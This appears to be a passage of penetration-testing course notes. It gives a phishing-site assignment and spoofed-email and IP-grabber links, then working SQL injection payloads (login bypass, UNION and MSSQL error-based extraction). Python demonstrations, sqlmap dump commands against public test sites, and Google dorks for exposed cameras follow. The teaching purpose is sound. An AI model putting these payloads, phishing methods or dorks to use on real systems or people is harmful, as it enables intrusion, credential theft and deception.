1440A fake email means a email generated by fake dummy server from which a attacker can generate there email and customize it to lure and attracts a Victim for Spear Phishing and other activities.
1441
1442Website - https://emkei.cz/
1443
1444----------------------------------------------------------------------------------------------------------------------------
1445Emails Tracing and Tracking
1446=====================
1447Demo of whoreadme.com
1448Demo of IP Grabber
1449http://www.fuglekos.com/ip-grabber/index.html
1450https://grabify.link/
1451http://whatstheirip.com
1452------------------------------------------------------------------------------------------------------------------------------------
1453
1454TASK
1455=====
1456 Create a phishing website for paytm cashback/linkedin/netflix/amazon prime video and host the same in localhost which will be convincing to your trainer.
1457
1458
1459
1460 SESSION 9
1461 =========
1462
1463INTRODUCTION TO VAPT
1464====================
1465
1466Let us First understand what does these 4 words mean -
1467
1468Vulnerability : These are the loopholes, mistakes, security holes, security misconfiguration which leads a attacker to know that this target is weak.
1469Assessment : Assessment simply means Analysis and to examine the Vulnerability which helps a Attacker to mitigate and develop its attacking procedure and strategy.
1470Penetration : This means to attack and exploit a Vulnerable System which leads by the Vulnerability Assessment Report of the Target.
1471Testing : Testing means applying different different attacking processes which can lead to a successful attempt of the Attack.
1472
1473The Term VAPT are two Different Processes, VA and PT.
1474
1475VA : To just scan for loopholes and weak security points. In this phase we just scan for the devices, web application, server, network, website and database. We generate a report on the performed scan.
1476PT : To gain access into the scanned vulnerabilities. We just try to hack into the services, devices, web application, servers and databases via the scanned vulnerabilities.
1477
1478
1479Bug Bounty - https://www.bugcrowd.com/bug-bounty-list/
1480
1481-------------------------------------------------------------
1482
1483INTRODUCTION TO WEB SECURITY STANDARDS - OWASP TOP 10
1484======================================================
1485
1486OWASP
1487=====
1488OWASP stands for Open Web Application Security Program, is a no-profit organization and a community which focuses on the SEcurity of the WEb Application Vulnerabilities. It is a Web Application Security Standard Now which every organization follows.
1489
1490OWASP TOP 10
1491============
1492It is a list generated by Owasp Organization which carries all the TOP 10 vulnerabilities of Web Applications worldwide. The list of Top 10 Vulnerabilities updates in every 2-3 Years which contains all the most common Vulnerabilities founding out in the Web Applications and the Attackers are Exploiting them. So, on the basis of those Top 10 Attacks, they create a list known as OWASP TOP 10.
1493
1494
1495OWASP TOP 10 - 2013
1496====================
1497A1. INJECTION
1498=============
1499Injection is a attack vector in which a attacker insert some SQL queries in the input metod of the Web Applicatyion which helps in extracting the juicy data of the Website from the Database. Types of Injections are basically - Union Based, Blind Based, Stacked Query Based, Error Based, LDAP Injections etc.
1500
1501A2-Broken Authentication and Session Management
1502======================================
1503Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
1504
1505A3-Cross-Site Scripting (XSS)
1506=============================
1507XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
1508
1509A4-Insecure Direct Object References
1510====================================
1511A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
1512
1513A5-Security Misconfiguration
1514=====================
1515Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.
1516
1517A6-Sensitive Data Exposure
1518==========================
1519Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
1520
1521A7-Missing Function Level Access Control
1522========================================
1523Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization
1524
1525A8-Cross-Site Request Forgery (CSRF)
1526====================================
1527A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
1528
1529A9-Using Components with Known Vulnerabilities
1530=============================================
1531Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.
1532
1533A10-Unvalidated Redirects and Forwards
1534==============================
1535Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
1536
1537
1538-------------------------------------------------------------
1539
1540INTRODUCTION TO DBMS
1541=====================
1542
1543Database
1544========
1545A database is a place in the backend where all the data get stored.
1546
1547
1548DBMS
1549====
1550DBMS stands for Database Management System is a program which manages the data incoming or outgoing, organizes it and provides ways for the data to be modified or extracted by users.The DBMS can Create, Insert, Modify, Delete and perform other operations on the Tables and Columns the Database we are operating on.
1551
1552Databases stores data in the Forms of Tables, Columns and Rows.
1553
1554Tables contains some columns having data and columns contains the rows having data.
1555
1556Eg. Employee Record
1557
1558Employee Name, ID , Contact number, email, address etc.
1559
1560---------------------------------------------
1561Name | EID | MOBILE NUMBER | EMAIL | ADDRESS |
1562----------------------------------------------
1563sairam|12|898776566|sairam@gmail.com|newdelhi|
1564----------------------------------------------
1565
1566Database only knows one language to communicate.
1567SQL - Structured Query Language.
1568
1569-------------------------------------------------------------
1570
1571SQL BASICS
1572==========
1573
1574SQL is the language in which a Database can communicate by creating , modifying or inserting any type of data. Structured Query Language works on the basis of queries.
1575
1576Queries are the commands used for creating, manupilating and deleting the data in the database.
1577
1578SQL QUERIES
1579===========
1580
1581= SELECT - extracts data from a database
1582= UPDATE - updates data in a database
1583= DELETE / DROP - deletes data from a database
1584= INSERT INTO - inserts new data into a database
1585= CREATE DATABASE - creates a new database
1586= ALTER DATABASE - modifies a database
1587= CREATE TABLE - creates a new table
1588= ALTER TABLE - modifies a table
1589= DROP TABLE - deletes a table
1590= SELECT * from trainees - Select everything from table name "trainees"
1591= WHERE - Showing the location of the data of the table,column etc.
1592
1593
1594= table_name : Table's Name
1595= column_name : Column's Name
1596= database() : Database's Name
1597= version() : Database's Version
1598
1599= orderby
1600= information_schema
1601= union select
1602= group_concat
1603
1604Practical Eg.
1605
1606Database = Lucideus
1607Table = Trainees
1608Columns = Name, Address, Age, Contact Details
1609
1610To Insert data in member table of lucideus database
1611
1612INSERT INTO `Trainees` (`Name`, `Address`, `Age`, `ContactDet`) VALUES ('Sairam ', 'New Delhi', '23', '998897363');
1613
1614------------------------------------------------------------
1615
1616
1617 '
1618
1619LVS SETUP AND CONFIGURATION
1620============================
1621
LVS stands for Lucideus VAPT Simulator. It is a deliberately vulnerable web application written in HTML, PHP, CSS, SQL and JavaScript that contains practicals for all the major web vulnerabilities, so that the user can understand each attack vector hands-on.

We host LVS on a local XAMPP server.
1625
1626Setup and Configuration
1627=================
Copy the zip file into C:\xampp\htdocs
Right-click the zip file and choose "Extract Here"
Start the XAMPP control panel and start Apache and MySQL
Open the browser and go to 127.0.0.1/lvs
It will show the message "Click here to create the Database".
After clicking, the database has been created; 127.0.0.1/phpmyadmin lists all the databases.
Go through the instruction page of LVS and then start learning through it.
1635
1636
1637-------------------------------------------------------------
1638
1639
1640
1641SQL INJECTION AUTHENTICATION BYPASS
1642====================================
1643
1644Attack Vector :
Log in as an administrator when you are only a simple user, or log into someone's account without knowing the username and password.

= OR GATE
= TAUTOLOGY CONDITION : a condition such as '1'='1' that is always true, so the WHERE clause of the login query matches every row.
1650
1651
16521 --> true
16530 --> false
1654
1655Logic Gates
1656=========
1657
OR GATE : if any input is true (1), the output is always true (1)
1659
1660 A | B | Resultant
1661 ------------------------
1662 0 | 0 | 0
1663 ------------------------
1664 1 | 0 | 1
1665 ------------------------
1666 0 | 1 | 1
1667 ------------------------
1668 1 | 1 | 1
1669
1670
1671
 1'or'1'='1

 The first quote closes the string the login form put our input into, OR adds a condition that is always true, and the query matches every row. The first row returned is usually the administrator.

1'or'1'='1 : True - Administrator
x'or'x'='x : True - Administrator
1679
1680
Login-form scenario (the form builds WHERE username='...' AND password='...' from the two fields)

 Username : 1'or'1'='1
 Password : 1'or'1'='1 --> Administrator access

 Username : admin'or'1'or'1'='1
 Password : admin'or'1'or'1'='1 --> Administrator access
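The scenario above, as an added worked example (this is not code from the course or from LVS): a login built by string concatenation is fed the 1'or'1'='1 payload and returns the administrator row, while the same lookup with bound parameters rejects it. The users table, its rows and the SQLite database are constructed for the example; a real application would use MySQL, but the quoting and precedence rules that make the bypass work are the same.

```python
import sqlite3

# Constructed sample data (not from the course): a users table in which the
# administrator happens to be the first row, as in many real applications.
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "S3cret!", "administrator"),
        (2, "sairam", "trainee123", "user"),
    ])
    return con

def login_vulnerable(con, username, password):
    """The flawed login: both fields are glued into the WHERE clause, so a quote
    in the input ends the string early and the rest is parsed as SQL.
    With 1'or'1'='1 in both fields the query becomes
      ... WHERE username='1'or'1'='1' AND password='1'or'1'='1'
    AND binds tighter than OR, the last '1'='1' is always true, every row
    matches and the first row (admin) is returned."""
    query = ("SELECT username, role FROM users "
             f"WHERE username='{username}' AND password='{password}'")
    return con.execute(query).fetchone()

def login_safe(con, username, password):
    """The fix: bound parameters. The driver sends the values separately from
    the SQL text, so a quote in the input is just a character inside the value."""
    query = "SELECT username, role FROM users WHERE username=? AND password=?"
    return con.execute(query, (username, password)).fetchone()
```

The x'or'x'='x variant from the notes works for the same reason: any two equal literals on both sides of = make a tautology.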
1689
1690
1691-------------------------------------------------------------
1692
Testing websites - demo.testfire.net, testphp.vulnweb.com
1694
1695---------------------------------------------------------------
1696
1697
1698
1699 SESSION 10
1700 ==========
1701
1702METHODS USED IN WEB APPLICATIONS
1703================================
1. GET - Requests data from a specified resource. The parameters travel in the URL itself, so they are visible in the address bar, the browser history and the proxy and server logs. eg. php?id=1, ?cat=54, ?test=query.

2. POST - Sends the data in the body of the HTTP request instead of the URL, so it does not appear in the address bar or history. It is not secret: anyone who can intercept the request (for example with Burp Suite) can read and modify it. eg. twitter.com/login.php
1708
1709----------------------------------------------------------
1710
1711INSECURE DIRECT OBJECT REFERENCE
1712================================
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory or database key, in a URL or form parameter. Without an access control check or other protection, an attacker can change that reference and directly access files, records, configuration and settings that the administrator never authorised for that user.
1714
1715For eg. :
1716
CHJM website (example) :

Accessing another user's account by changing the id parameter -
www.chjm.org/login/.../php?id=alex
www.chjm.org/login/../php?id=logan ( entered into Logan's account without Logan's credentials)


Accessing pages that a basic user is not authorised to see -
www.chjm.org/user+profile -- /../settings/config.html

www.chjm.org/login/../php?id=logan/settings/config.html
1728
1729
1730- Demo in WAVE.
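The two failures above (reading another user's profile through ?id=, and reaching an admin-only settings page) as an added example, not code from the course or from the CHJM site: a minimal handler that looks the record up by the client-supplied id with no ownership check, beside the same handler with the check the text says is missing. The profile records, the admin page and the session handling are constructed assumptions.

```python
from urllib.parse import urlparse, parse_qs

# Constructed records (hypothetical users and an admin-only configuration page).
PROFILES = {
    "alex":  {"email": "alex@example.org",  "role": "user"},
    "logan": {"email": "logan@example.org", "role": "user"},
    "admin": {"email": "admin@example.org", "role": "administrator"},
}
ADMIN_PAGES = {"settings/config.html": "db_password=hunter2"}

class Forbidden(Exception):
    """Raised instead of serving the object when the caller may not see it."""

def requested_id(url):
    """Pull the id= parameter out of a URL such as /profile.php?id=logan."""
    return parse_qs(urlparse(url).query).get("id", [None])[0]

def profile_vulnerable(session_user, url):
    """IDOR: the record is fetched by the client-supplied id and nothing
    checks whether the logged-in user (session_user) owns it."""
    return PROFILES[requested_id(url)]

def profile_checked(session_user, url):
    """Fix: the reference is still direct, but it is verified against the
    session before the object is returned."""
    target = requested_id(url)
    caller_is_admin = PROFILES[session_user]["role"] == "administrator"
    if target != session_user and not caller_is_admin:
        raise Forbidden(f"{session_user} may not read profile {target}")
    return PROFILES[target]

def admin_page(session_user, path):
    """Authorisation check for the settings page a basic user must never reach;
    hiding the link is not a control, the check has to be server-side."""
    if PROFILES[session_user]["role"] != "administrator":
        raise Forbidden(f"{session_user} may not read {path}")
    return ADMIN_PAGES[path]
```

The check compares the requested object against the identity in the server-side session, never against anything the client sent; that is the whole difference between the two profile handlers.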
1731
1732-------------------------------------------------------------------------------------------
1733
1734SENSITIVE DATA EXPOSURE
1735=======================
Many web applications do not properly protect sensitive data such as names, IDs, credit card details and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Encryption matters here as well: if the data is stored or transmitted in plain text, it is far easier for an attacker or any other individual to read it.
1737
1738Types of Sensitive Data
1739=======================
1740
17411. Personal - Names, Address , Contact Numbers etc.
17422. Confidential - ID,Passwords - Credentials, Aadhar No.
17433. Financial - Bank Accounts numbers, credit cards, debit cards etc.
17444. Health Information - Policies, insurances etc.
1745
1746Demonstration on LVS.
1747
1748----------------------------------------------------------
1749
1750DVWA SETUP AND CONFIGURATION
1751============================
DVWA stands for Damn Vulnerable Web Application. It is a PHP/MySQL web application built for learning the OWASP Top 10 hands-on, like LVS.
1753
1754STEPS
1755=====
Copy the zip file into C:\xampp\htdocs
Right-click the zip file and choose "Extract Here"
Start the XAMPP control panel and start Apache and MySQL
Go to the dvwa directory in "htdocs", open the folder config, open config.inc.php (copy it from config.inc.php.dist if only that file exists) and set the database password to "" (empty), because MySQL on XAMPP runs with an empty root password by default.
Open the browser and go to 127.0.0.1/dvwa
It will show the message "Click here to create the Database".
After clicking, the database has been created; 127.0.0.1/phpmyadmin lists all the databases.
Go through the instruction page of DVWA and then start learning through it.
1764
1765----------------------------------------------------------
1766
1767OWASP A1. INJECTIONS
1768=====================
1769
1770UNION BASED SQL INJECTION
1771=========================
UNION-based SQLi is an attack vector in which the attacker enters SQL syntax into an input of the web application UI and, because the input is concatenated into the application's query, gets to talk to the database directly.
The attacker appends a UNION SELECT so that the results of his or her own query are printed in the page alongside the genuine results, and works down from Database -> Tables -> Columns -> Rows to the "juicy" data.
1774
1775TERMINOLOGIES
1776=============
1. information_schema : a built-in database that describes every database, table, column and other object on the server. It is considered the mother of all information in the database.
2. -- : starts a comment; everything after it on the line is ignored by the database. MySQL requires a space after the two dashes, and the + is URL-decoded to that space, hence --+ in URLs.
3. # : also starts a comment; everything entered after # is not considered.
4. database() - name of the current database
5. version() - version of the database server.

column_name - column in information_schema.columns holding the column names
table_name - column in information_schema.tables holding the table names

= ORDER BY n - sorts the result by the n-th column; asking for a column number that does not exist produces an error, which is how the number of columns is counted.
= UNION SELECT - appends the rows of a second query to the first query's result; both must return the same number of columns.
= GROUP_CONCAT - joins the values of a column from many rows into one string.
 concatenation = joining strings end to end
1791
1792
1793
1794Target - http://127.0.0.1/dvwa/vulnerabilities/sqli/
1795
Note - For manual SQLi Firefox is recommended, because its address bar shows the decoded URL: the special symbols and spaces you type stay visible as you wrote them instead of being shown URL-encoded.
1797
1798STEPS
1799======
1800
Step 1: Find a GET parameter
 eg. php?id=1
 ?cat=24
 ?test=query
Click every possible link, or give inputs to search boxes that submit via GET, and look for parameters in the URL.

 "http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#"
1808
1809
Step 2: Check whether the parameter is injectable
 ?id=1'
 php?id=1'
If a single quote produces a database error, the input reaches the query unescaped and the site is very probably vulnerable to UNION-based SQLi.

It will give - "http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1'&Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1"
1817
1818
Step 3: Count the columns of the query's result set
 order by 100--+
 order by 200--+
 order by 300--+
A large number confirms the error "Unknown column 'N' in 'order clause'"; then step upward from 1 until that error appears. The last number that worked is the column count.

Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Unknown column '3' in 'order clause' --> the query has 2 columns
1829
1830
Step 4: UNION SELECT the same number of columns and see which of them are printed on the page (the "vulnerable" columns)
 union select 1,2--+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
The numbers that appear in the page mark the columns whose content is reflected.
1835
1836
Step 5: Extract information from the database through a reflected column
 - database()
 - version()
 - union select version(),2--+
 - union select 1,version()--+

 - union select all 1,version()--+ : 10.1.25-MariaDB
 - union select all 1,database()--+ : dvwa
1845
Step 6: Ask the mother of the database - information_schema

= Extracting table names
 - union select all 1,table_name from information_schema.tables--+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#

= After choosing a juicy table, extract the names of its columns from information_schema.columns :

 - union select all 1,column_name from information_schema.columns where table_name='users'--+

= To get the data from the columns (user, password)

 - union select user,password from users--+
 - http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select group_concat(user,0x0a,password),2 from users--+&Submit=Submit#
 (0x0a is a newline, so group_concat prints one user/password pair per line)

And we will get the juicy data.
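Steps 2 to 6 above carried out end to end, as an added example that is not part of the course and not DVWA's own code. The vulnerable endpoint, the users and guestbook tables and the SQLite database are constructed for the example (the two password hashes are DVWA's well-known defaults). SQLite has no information_schema, so sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns, and sqlite_version() for version(); the probing logic (quote, ORDER BY count, UNION SELECT with a marker, GROUP_CONCAT dump) is exactly the one the steps describe.

```python
import sqlite3

# Constructed sample data (not the course's database): a DVWA-like users table
# with its default md5 password hashes, plus an unrelated guestbook table.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(user_id INTEGER, first_name TEXT, last_name TEXT,
                           user TEXT, password TEXT);
        INSERT INTO users VALUES (1,'admin','admin','admin','5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES (2,'Gordon','Brown','gordonb','e99a18c4428cb38d5f260853678922e3');
        CREATE TABLE guestbook(comment_id INTEGER, comment TEXT, name TEXT);
    """)
    return con

def page(con, id_param):
    """The vulnerable endpoint: the ?id= value is pasted straight into the query.
    Returns the rows the page would print, or the database's error text."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{id_param}'"
    try:
        return con.execute(query).fetchall()
    except sqlite3.OperationalError as e:
        return f"ERROR: {e}"

def is_injectable(con):
    """Step 2: a lone quote breaks the query and the error leaks back."""
    return isinstance(page(con, "1'"), str)

def count_columns(con, max_cols=20):
    """Step 3: ORDER BY n until the database complains; the last good n is the count."""
    for n in range(1, max_cols + 1):
        if isinstance(page(con, f"1' ORDER BY {n}--"), str):
            return n - 1
    return max_cols

def union_extract(con, expr, source=""):
    """Steps 4-6: UNION SELECT with a marker (1) in the first column and the
    expression we want in the second; rows carrying the marker are ours."""
    rows = page(con, f"1' UNION SELECT 1, {expr} {source}--")
    return [r[1] for r in rows if r[0] == 1]

# SQLite has no information_schema; sqlite_master and pragma_table_info() play
# the role of information_schema.tables / information_schema.columns in MySQL.
def table_names(con):
    return union_extract(con, "name", "FROM sqlite_master WHERE type='table'")

def column_names(con, table):
    return union_extract(con, "name", f"FROM pragma_table_info('{table}')")

def dump_credentials(con):
    # MySQL: group_concat(user,0x0a,password); SQLite spells the newline char(10).
    return union_extract(con, "group_concat(user || ':' || password, char(10))", "FROM users")[0]
```

Usage: con = build_db(); count_columns(con) gives 2, table_names(con) lists users and guestbook, column_names(con, "users") lists the five columns, and dump_credentials(con) returns the user:hash pairs one per line.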
1864
1865-------------------------------------------------------------------------------
1866
1867TESTING WEBSITES
1868================
18691. http://demo.testfire.net/
18702. http://testphp.vulnweb.com/
1871
1872
1873TASKS
1874=====
18751. What is the Meaning of % in URL?
18762. What is WAF?
1877
1878-------------------------------------------------------------------------------
1879
1880
1881
1882 SESSION 11
1883 ==========
1884
1885ERROR BASED SQL INJECTION
1886==========================
1887
Error-based SQL injection is a technique that makes the database leak data inside its own error messages. Unlike UNION-based injection, nothing is printed in the normal page: the injected query is made to fail deliberately, and the error text returned to the browser contains the value we asked for. It is used when the page shows database errors but does not reflect query results.

Error messages are very useful during the development of a web application, but they must be disabled on a live website, because they reveal internal details of the database.

The variant taught here targets ASP / ASP.NET applications (asp, aspx), Microsoft's server-side web technology, backed by Microsoft SQL Server (MSSQL). Its TOP keyword and its verbose type-conversion errors ("Conversion failed when converting the nvarchar value '...' to data type int.") are what make the technique work.
1893
1894
1895TRUE CONDITION :
1896---------------
1897
1898Here 1 is True and 0 is False.
1899
1900AND GATE REPRESENTATION
1901
1902A | B | Resultant |
1903------------------------------|
19040 | 0 | 0 |
19050 | 1 | 0 |
19061 | 0 | 0 |
19071 | 1 | 1 |
1908
1909Checking the Last True Condition it states :
1910
19111 & 1 = 1 ie; 1*1=1 or True*True = True
1912
1913MAKING THIS TRUE CONDITION FALSE
1914
19151 & 0 = 0 ie; 1*0=0 or True*False = False
1916
1917
Error-based SQL injection works by building a condition that forces the database into an error, so that the database responds with the error message and the sensitive data embedded in it.
1919
1920
1921DEMONSTRATION
1922===============
1923
Normally the URL and the condition look like :

bhai.com/account.aspx?id=10 | ?id=10 and 1=1 //TRUE
The condition is true and the genuine page is returned.

- We can turn the condition false :
 ?id=10 and 1=0 //FALSE
A false condition by itself only returns an empty page; the data-extracting subquery is hung on this condition so that its result is forced into the error message instead.
1932
1933
1934
1935------------------------------------------------------------------
1936
1937
1938CONDITIONS OF ERROR BASED SQLI
1939===============================
= Only one value can be extracted per request, unlike UNION-based injection where a whole column is printed at once.
= The TOP 1 subquery returns only the first row of the catalogue at a time.
= To reach the next table, the names already seen are excluded with NOT IN and the query is repeated; the same goes for columns and then for rows.
1943
1944-----------------------------------------------------------------
1945
1946
ORDER IN WHICH TOP 1 WALKS THE TABLES :

 |----------------|
 |Others | TOP 1 returns "Others" first. To reach
 |----------------| the data of "Users", you first have to
 |Guestbook | exclude "Others" and "Guestbook" with
 |----------------| NOT IN, one request per table.
 |Users |
 |----------------|
 |Images |
 |----------------|
1958
1959------------------------------------------------------------------
1960
1961
First, as in UNION-based SQLi, find a parameter that is injectable. Here there is no reflected column to look for: the value comes back inside the error message, one value per request.

After the error condition is confirmed, we start extracting the data, beginning with the first table of the database.

For selecting the top (first) table (we cannot jump straight to the "n"-th table or column), the selected name is wrapped in CONVERT(int, ...): a table name is not a number, the conversion fails, and MSSQL prints the offending value in the error.

= IS USED FOR A COMMAND.

= bhai.com/account.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))--

This makes the database error out with the name of the first table. If the table looks juicy we extract it, else we go on to the next tables and columns.

----

For skipping the current table and selecting the next one,

= bhai.com/account.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Name of the previous tables')))--

Here we select the next top table excluding the previous ones and read its name out of the error. For eg. if the first two tables were named "others" and "guestbook", the query becomes :
?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('others','guestbook')))--

--------

After reaching our juicy table (say "users"), we walk its columns the same way.

= ?id=10 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--

and then, for the next column,

= ?id=10 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('Previous Column Name')))--

Each request yields one more column name of the "users" table; the rows are finally read out with the same TOP 1 / NOT IN pattern on the table itself.
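The TOP 1 / NOT IN walk above, automated, as an added example that is not part of the course: the loop feeds each error message back into the next query's exclusion list until the server stops erroring, first over the tables and then over each table's columns. No MSSQL server is involved; the catalogue is a constructed SQLite schema with the table names the notes use (LIMIT 1, sqlite_master and pragma_table_info() standing in for TOP 1, information_schema.tables and information_schema.columns), and the conversion-error channel of MSSQL is reproduced by a mock server function, which is an assumption of the example.

```python
import re
import sqlite3

# Constructed schema (not from the course) with the table names the notes use.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE others(id INTEGER);
        CREATE TABLE guestbook(id INTEGER, comment TEXT);
        CREATE TABLE users(id INTEGER, uname TEXT, pass TEXT);
        CREATE TABLE images(id INTEGER, path TEXT);
    """)
    return con

ERR = re.compile(r"nvarchar value '([^']*)' to data type int")

def server(con, injected_subquery):
    """Mock of the ASP/MSSQL page for ?id=10 and 1=CONVERT(int,(<subquery>)).
    The subquery runs on SQLite; the MSSQL conversion failure is reproduced by
    hand, and is the only channel the attacker sees (assumption of the example)."""
    row = con.execute(injected_subquery).fetchone()
    if row is None or str(row[0]).lstrip("-").isdigit():
        return "HTTP 200 normal page"
    return ("HTTP 500 Conversion failed when converting the nvarchar value "
            f"'{row[0]}' to data type int.")

def walk(con, query_for):
    """Generic 'TOP 1 ... NOT IN (seen)' walk: one name per error message,
    until a request comes back without an error (nothing left to exclude)."""
    seen = []
    while True:
        m = ERR.search(server(con, query_for(seen)))
        if not m:
            return seen
        seen.append(m.group(1))

def quoted(names):
    return ",".join(f"'{n}'" for n in names) or "''"

def table_query(seen):
    # MSSQL: select top 1 table_name from information_schema.tables where table_name not in (...)
    return (f"SELECT name FROM sqlite_master WHERE type='table' "
            f"AND name NOT IN ({quoted(seen)}) LIMIT 1")

def column_query_for(table):
    # MSSQL: select top 1 column_name from information_schema.columns
    #        where table_name='<table>' and column_name not in (...)
    def query(seen):
        return (f"SELECT name FROM pragma_table_info('{table}') "
                f"WHERE name NOT IN ({quoted(seen)}) LIMIT 1")
    return query

def enumerate_schema(con):
    """Tables in the order TOP 1 returns them, then the columns of each."""
    tables = walk(con, table_query)
    return {t: walk(con, column_query_for(t)) for t in tables}
```

The walk is the same whatever the catalogue: every answer is appended to the NOT IN list, so the request count equals the number of names plus one final request that returns the normal page.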
1992
1993
1994------------------------------------------------------------------
1995
1996
1997STACKED QUERY SQL INJECTION
1998============================
1999
Stacked-query SQL injection terminates the original statement with a semicolon and appends a completely new one. Because the second statement can be anything, the attacker can modify data and call stored procedures: creating, deleting and modifying the database and its objects, not just reading them. Whether it works depends on the database and on the driver the application uses, since many drivers execute only one statement per call. This technique is widely used in SQL injection attacks and understanding it is essential to a sound understanding of the issue.

Automated tools such as sqlmap can detect and use stacked queries; browser add-ons such as Hackbar help with crafting the requests by hand.
2003
2004https://www.youtube.com/watch?v=6cd4xY9_DNA
2005
2006SQLMAP
2007=======
sqlmap is an open-source, Python-based penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine and many features ranging from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system through out-of-band connections.
2009
2010DEMONSTRATION ON KALI LINUX
2011============================
sqlmap is a command-line tool; it ships with Kali Linux but runs anywhere Python is available. The steps below use it from the Kali terminal.
2013
2014Target : DVWA , http://testphp.vulnweb.com/
2015
The first step is finding a GET parameter in the web application, then enumerating it with sqlmap.

= The commands go like this.

= sqlmap

= sqlmap --url "http://testphp.vulnweb.com/search.php?test=query"
(-u or --url gives the URL carrying the GET parameter to test)

= sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" --dbs
(--dbs lists the databases; sqlmap runs the equivalent of the database() and information_schema queries through the injectable parameter it finds on its own.)

= sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" --current-user
(This lists the database user the application connects as.)

= sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart --tables
(Once the database name is known, -D tells sqlmap which database to enumerate further; --tables lists all the table names of that database.)

= sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users --columns
(This enumerates the column names of the chosen table.)

= sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users -C email,name,pass,phone,uname --dump
(Dumps the chosen columns of the users table.)
2039
2040------------------------------------------------------------------------------------------
2041
2042
2043
2044GOOGLE DORKING
2045================
Google dorking, also known as Google hacking, uses advanced search operators to return information that is difficult to locate through simple search queries, including information that was never intended for public viewing but has not been adequately protected. Attackers use dorks to pull out exactly the data they are after.
2047
2048DORKS COMMANDS
2049=================
2050
= intitle: searches for pages with specific text in their HTML title. intitle:"login page" finds pages titled "login page".
= inurl: searches for pages based on text contained in the URL, eg. inurl:login.php
= intext: searches the entire content of a page for the supplied keywords.
= site: limits the scope of a query to a single website.
= cache: shows the cached (previously stored) version of a page.
= filetype: restricts results to a particular file type/extension, eg. filetype:pdf
= intitle:"index of" : finds open directory listings, where a web server exposes the whole index of a folder and its files for browsing.

= Finding live cameras - inurl:"/view/view.shtml" returns live camera feeds of Axis devices.
2060
2061Google Dork Database for Cyber Security Professionals - https://www.exploit-db.com/google-hacking-database/
2062
2063
2064Exploitation Database for Hackers : exploit-db.com (Offensive Security)
2065
2066-----------------------------------------------------------------------------------------
2067
2068TASKS
2069=====
2070
1. Study UNION-based SQL injection in depth.
2. Use sqlmap on testphp.vulnweb.com with the steps shown.
3. List 10 percent-encoded (%xx) codes for special characters in URLs.
2074------------------------------------------------------------------------------------------
2075
2076
2077
2078 SESSION 12
2079 ==========
2080
2081INTRODUCTION TO FIREWALLS , IDS , IPS
2082======================================
2083
2084FIREWALLS
2085==========
A firewall is a component that filters the incoming and outgoing (inbound and outbound) traffic of a network according to rule sets written by the network administrator: addresses, ports, protocols and, in more advanced firewalls, signatures of known malicious content. Packets that match a blocking rule are dropped.
2087
2088TYPES OF FIREWALLS
2089===================
1. Software-based firewalls : firewalls that run as an application on the host, applying rule sets to its inbound and outbound traffic. Eg. Windows Firewall, Linux iptables.

